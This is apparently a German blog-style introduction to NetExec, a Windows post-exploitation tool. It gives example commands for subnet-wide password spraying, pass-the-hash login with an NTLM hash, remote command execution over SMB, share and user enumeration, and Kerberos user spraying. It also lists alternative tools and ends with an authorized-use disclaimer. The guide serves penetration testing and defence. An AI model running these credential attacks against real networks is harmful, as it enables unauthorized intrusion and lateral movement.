🔐 NetExec – Das Schweizer Taschenmesser für Windows-Netzwerke

NetExec (ehemals bekannt als CrackMapExec) ist ein leistungsstarkes Open-Source-Werkzeug für die Post-Exploitation und Netzwerk-Erkundung in Windows-Umgebungen. Es wurde für Red Teams, Penetrationstester und Blue Teams entwickelt und vereint viele häufig genutzte Techniken zur Authentifizierung, Privilege Escalation und lateralem Movement in einem einzigen Tool.


🧰 Hauptfunktionen

  • 🔎 Netzwerkerkennung & Benutzervalidierung

  • 🔐 Brute-Force / Spray-Angriffe auf SMB, RDP, WinRM etc.

  • 🎯 Pass-the-Hash / Pass-the-Ticket / Kerberos-Angriffe

  • 🛠️ Remote Command Execution über verschiedene Protokolle

  • 📃 Enumerierung von Shares, Gruppen und Rechten

  • 🧩 Modular erweiterbar durch Plugins


🧪 Praxisbeispiele

✅ 1. Benutzer/Passwort testen

netexec smb 10.10.0.0/24 -u admin -p 'Winter2024'

Testet SMB-Login über das gesamte Subnetz mit den angegebenen Credentials.


🔑 2. Pass-the-Hash Angriff

netexec smb 10.10.10.5 -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

Authentifiziert sich mit einem NTLM-Hash statt einem Passwort.


🖥️ 3. Remote-Befehl ausführen

netexec smb 10.10.10.5 -u user -p 'Passwort123' -x 'whoami'

Führt whoami remote über SMB auf dem Zielhost aus.


📁 4. Shares & Benutzerrechte anzeigen

netexec smb 10.10.10.5 -u user -p 'Passwort123' --shares --users

Listet Freigaben und Benutzerinformationen.


📜 5. Benutzerliste mit Kerberos

netexec kerberos 10.10.10.0/24 -u users.txt -p ''

Führt ein Benutzer-Spray gegen Kerberos durch (z. B. zur Validierung).


🕾️ Alternativen zu NetExec

Es gibt mehrere Tools, die ähnliche Funktionen abdecken – je nach Use Case und Umgebung:

ToolBeschreibung
ImpacketPython-Bibliothek mit Tools wie psexec.py, smbclient.py, secretsdump.py – sehr flexibel
RPCMapExecFokus auf RPC-Protokolle zur Enumeration & Execution
CrackMapExec (legacy)Der Vorgänger von NetExec – nicht mehr aktiv gepflegt
WinRM ShellsFür direkten Zugriff auf Windows Remote Management Sessions
BloodHound + SharpHoundFür AD-Recon und Angriffsgraphen

📦 Installation

NetExec kann direkt via pipx oder aus dem Source installiert werden:

pipx install git+https://github.com/Pennyw0rth/NetExec

Voraussetzung: Python 3.10 oder höher


🧠 Fazit

NetExec ist ein mächtiges, modulares Werkzeug für alle, die sich mit Windows-Umgebungen auseinandersetzen – sei es für Pentests oder zur Verteidigung. Die einfache Bedienung kombiniert mit starker Funktionalität macht es zu einem der meistgenutzten Tools im Windows AD-Kontext.


🗷️ Hinweis: Der verantwortungsvolle Einsatz dieses Tools ist Pflicht. Es darf nur in autorisierten Szenarien (z. B. mit schriftlicher Zustimmung) verwendet werden!